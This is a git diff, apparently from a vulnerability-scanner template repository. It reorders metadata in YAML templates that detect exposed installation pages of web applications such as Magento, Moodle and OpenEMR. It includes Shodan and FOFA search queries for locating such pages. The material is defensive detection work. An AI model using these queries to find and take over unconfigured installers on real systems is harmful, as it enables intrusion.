+# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml
index 6a92bd5f19..9ad425424f 100644
--- a/http/misconfiguration/installer/kodbox-installer.yaml
+++ b/http/misconfiguration/installer/kodbox-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Kodbox is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="kodbox" && body="install"
- product: kodbox
vendor: kodcloud
+ product: kodbox
+ fofa-query: title="kodbox" && body="install"
tags: misconfig,exposure,install,kodbox
- classification:
- cpe: cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml
index cc6d9ec512..908f51ad8b 100644
--- a/http/misconfiguration/installer/librenms-installer.yaml
+++ b/http/misconfiguration/installer/librenms-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed LibreNMS installation page.
reference:
- https://docs.librenms.org/Installation/Install-LibreNMS/
+ classification:
+ cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"LibreNMS Install"
- product: librenms
vendor: librenms
+ product: librenms
+ shodan-query: html:"LibreNMS Install"
tags: misconfig,install,exposure,librenms
- classification:
- cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/limesurvey-installer.yaml b/http/misconfiguration/installer/limesurvey-installer.yaml
index aa70fb3571..7946d5bae7 100644
--- a/http/misconfiguration/installer/limesurvey-installer.yaml
+++ b/http/misconfiguration/installer/limesurvey-installer.yaml
@@ -5,6 +5,8 @@ info:
author: DhiyaneshDk
severity: high
description: Limesurvey is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -12,9 +14,6 @@ info:
product: limesurvey
vendor: limesurvey
tags: misconfig,limesurvey,install
-
- classification:
- cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml
index eba6fd1171..5211c62470 100644
--- a/http/misconfiguration/installer/lychee-installer.yaml
+++ b/http/misconfiguration/installer/lychee-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Lychee is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Lychee-installer"
- product: lychee
vendor: lycheeorg
+ product: lychee
+ shodan-query: html:"Lychee-installer"
tags: misconfig,lychee,install,exposure
- classification:
- cpe: cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml
index b8fecf2e4c..942b7d47f0 100644
--- a/http/misconfiguration/installer/magento-installer.yaml
+++ b/http/misconfiguration/installer/magento-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Magento is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Magento Installation"
- product: magento
vendor: magento
+ product: magento
+ shodan-query: html:"Magento Installation"
tags: misconfig,magento,install,exposure
- classification:
- cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml
index 25e7aec5f3..22fa35c1c1 100644
--- a/http/misconfiguration/installer/magnolia-installer.yaml
+++ b/http/misconfiguration/installer/magnolia-installer.yaml
@@ -7,16 +7,16 @@ info:
description: Magnolia CMS is susceptible to the Installation page exposure due to misconfiguration.
reference:
- https://www.magnolia-cms.com/
+ classification:
+ cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Magnolia Installation"
- product: magnolia_cms
vendor: magnolia-cms
+ product: magnolia_cms
+ shodan-query: title:"Magnolia Installation"
tags: magnolia,exposure,installer,misconfig
- classification:
- cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml
index 302e134b69..5fb2398805 100644
--- a/http/misconfiguration/installer/mantisbt-installer.yaml
+++ b/http/misconfiguration/installer/mantisbt-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: high
description: MantisBT is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Administration - Installation - MantisBT"
- product: mantisbt
vendor: mantisbt
+ product: mantisbt
+ shodan-query: html:"Administration - Installation - MantisBT"
tags: misconfig,mantisbt,install,exposure
- classification:
- cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/matomo-installer.yaml b/http/misconfiguration/installer/matomo-installer.yaml
index 5ef364d080..5f6e4eb311 100644
--- a/http/misconfiguration/installer/matomo-installer.yaml
+++ b/http/misconfiguration/installer/matomo-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Matomo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Matomo"
- product: matomo
vendor: matomo
+ product: matomo
+ shodan-query: title:"Matomo"
tags: misconfig,matomo,install
- classification:
- cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/mautic-installer.yaml b/http/misconfiguration/installer/mautic-installer.yaml
index 796ec33c74..22588733f9 100644
--- a/http/misconfiguration/installer/mautic-installer.yaml
+++ b/http/misconfiguration/installer/mautic-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Mautic is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Mautic Installation"
- product: mautic
vendor: acquia
+ product: mautic
+ shodan-query: html:"Mautic Installation"
tags: misconfig,mautic,install
- classification:
- cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/monstra-installer.yaml b/http/misconfiguration/installer/monstra-installer.yaml
index 0e556c6a46..9c8abf71e8 100644
--- a/http/misconfiguration/installer/monstra-installer.yaml
+++ b/http/misconfiguration/installer/monstra-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Monstra is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: 'title:"Monstra :: Install"'
- product: monstra_cms
vendor: monstra
+ product: monstra_cms
+ shodan-query: 'title:"Monstra :: Install"'
tags: misconfig,monstra,install
- classification:
- cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml
index e899799053..63d985e0e7 100644
--- a/http/misconfiguration/installer/moodle-installer.yaml
+++ b/http/misconfiguration/installer/moodle-installer.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: Moodle is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Installation Moodle"
- product: moodle
vendor: moodle
+ product: moodle
+ shodan-query: title:"Installation Moodle"
tags: misconfig,moodle,install,exposure
- classification:
- cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml
index e0d3ddbe88..2836d51d6c 100644
--- a/http/misconfiguration/installer/moosocial-installer.yaml
+++ b/http/misconfiguration/installer/moosocial-installer.yaml
@@ -4,16 +4,16 @@ info:
name: mooSocial Installation - Exposure
author: ritikchaddha
severity: high
+ classification:
+ cpe: cpe:2.3:a:moosocial:moosocial:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"mooSocial Installation"
- product: moosocial
vendor: moosocial
+ product: moosocial
+ shodan-query: html:"mooSocial Installation"
tags: exposure,moosocial,misconfig,install
- classification:
- cpe: cpe:2.3:a:moosocial:moosocial:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/mosparo-install.yaml b/http/misconfiguration/installer/mosparo-install.yaml
index 0e1f5107ee..7564e300ab 100644
--- a/http/misconfiguration/installer/mosparo-install.yaml
+++ b/http/misconfiguration/installer/mosparo-install.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: high
description: mosparo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Setup - mosparo"
- product: mosparo
vendor: mosparo
+ product: mosparo
+ shodan-query: title:"Setup - mosparo"
tags: misconfig,mosparo,install
- classification:
- cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml
index abed1c9937..dfbf569588 100644
--- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml
+++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed Mura CMS Setup page.
reference:
- https://www.murasoftware.com/mura-cms/
+ classification:
+ cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="Mura CMS - Setup"
- product: mura_cms
vendor: murasoftware
+ product: mura_cms
+ fofa-query: body="Mura CMS - Setup"
tags: misconfig,install,exposure,mura-cms
- classification:
- cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml
index f1dcfe234f..fe83cc79bc 100644
--- a/http/misconfiguration/installer/nagiosxi-installer.yaml
+++ b/http/misconfiguration/installer/nagiosxi-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Nagios XI is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Nagios XI"
- product: nagios_xi
vendor: nagios
+ product: nagios_xi
+ shodan-query: title:"Nagios XI"
tags: misconfig,exposure,install,nagiosxi
- classification:
- cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml
index 7c964203db..e40562fa3d 100644
--- a/http/misconfiguration/installer/nodebb-installer.yaml
+++ b/http/misconfiguration/installer/nodebb-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: NodeBB Web is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"NodeBB Web Installer"
- product: nodebb
vendor: nodebb
+ product: nodebb
+ shodan-query: title:"NodeBB Web Installer"
tags: misconfig,nodebb,install,exposure
- classification:
- cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml
index ba84be1d13..a47778409a 100644
--- a/http/misconfiguration/installer/octoprint-installer.yaml
+++ b/http/misconfiguration/installer/octoprint-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Checks for the presence of a OctoPrint Installer Page.
+ classification:
+ cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="Thank you for installing OctoPrint"
- product: octoprint
vendor: octoprint
+ product: octoprint
+ fofa-query: body="Thank you for installing OctoPrint"
tags: install,octoprint,misconfig
- classification:
- cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml
index 3d61f919d9..a597aca259 100644
--- a/http/misconfiguration/installer/ojs-installer.yaml
+++ b/http/misconfiguration/installer/ojs-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: high
description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.favicon.hash:2099342476
- product: open_journal_systems
vendor: openjournalsystems
+ product: open_journal_systems
+ shodan-query: http.favicon.hash:2099342476
tags: misconfig,ojs,install,exposure
- classification:
- cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml
index e3947628e7..38f593ed55 100644
--- a/http/misconfiguration/installer/onlyoffice-installer.yaml
+++ b/http/misconfiguration/installer/onlyoffice-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed OnlyOffice Setup page.
reference:
- https://www.onlyoffice.com/
+ classification:
+ cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Portal Setup"
- product: onlyoffice
vendor: onlyoffice
+ product: onlyoffice
+ shodan-query: html:"Portal Setup"
tags: misconfig,install,exposure,onlyoffice
- classification:
- cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml
index acd91de701..6272299428 100644
--- a/http/misconfiguration/installer/openemr-setup-installer.yaml
+++ b/http/misconfiguration/installer/openemr-setup-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed OpenEMR setup installation pages which could allow unauthorized access or information disclosure.
reference:
- https://www.open-emr.org/
+ classification:
+ cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"OpenEMR Setup Tool"
- product: openemr
vendor: open-emr
+ product: openemr
+ shodan-query: title:"OpenEMR Setup Tool"
tags: misconfig,install,exposure,openemr
- classification:
- cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml
index 2b6e07d8ba..9c22fc906d 100644
--- a/http/misconfiguration/installer/openfire-setup.yaml
+++ b/http/misconfiguration/installer/openfire-setup.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Checks for the presence of a Openfire Setup Page.
+ classification:
+ cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Welcome to Openfire Setup"
- product: openfire
vendor: igniterealtime
+ product: openfire
+ shodan-query: html:"Welcome to Openfire Setup"
tags: install,openfire,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml
index 9671ef5527..b128e86b81 100644
--- a/http/misconfiguration/installer/openmage-install.yaml
+++ b/http/misconfiguration/installer/openmage-install.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: OpenMage is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:openmage:openmage:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"OpenMage Installation Wizard"
- product: openmage
vendor: openmage
+ product: openmage
+ shodan-query: title:"OpenMage Installation Wizard"
tags: misconfig,openmage,install,exposure
- classification:
- cpe: cpe:2.3:a:openmage:openmage:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml
index 1ca6a4b7c7..da68dde354 100644
